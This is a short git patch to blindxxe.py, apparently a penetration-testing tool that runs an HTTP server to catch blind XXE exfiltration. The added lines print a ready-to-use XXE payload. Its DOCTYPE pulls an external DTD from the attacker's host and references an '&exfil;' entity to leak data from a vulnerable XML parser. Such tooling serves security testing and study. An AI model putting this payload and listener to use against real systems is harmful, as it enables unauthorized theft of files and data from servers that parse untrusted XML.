From 084d179e71f15964448587aabdce009a53ddaa19 Mon Sep 17 00:00:00 2001
From: Mariusz B <mb@binary-offensive.com>
Date: Tue, 23 Oct 2018 22:40:06 +0200
Subject: [PATCH] Improved blindxxe.py script (3)

---
 web/blindxxe.py | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/web/blindxxe.py b/web/blindxxe.py
index 058edd7..474d08a 100644
--- a/web/blindxxe.py
+++ b/web/blindxxe.py
@@ -145,7 +145,6 @@ def fetchRhost():
     global config
     config['rhost'] = socket.gethostbyname(socket.gethostname())
 
-    print('[>] RHOST set to: {}'.format(config['rhost']))
 
 def main(argv):
     global config
@@ -160,6 +159,16 @@ def main(argv):
     print('[+] Serving HTTP server on: ("{}", {})'.format(
         config['listen'], config['port']
     ))
+    print('[+] RHOST set to: {}'.format(config['rhost']))
+
+    print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
+    print('''
+
+<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "http://{}/test.dtd">
+<foo>&exfil;</foo>
+
+    '''.format(config['rhost']))
 
     server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
     thread = threading.Thread(target=server.serve_forever)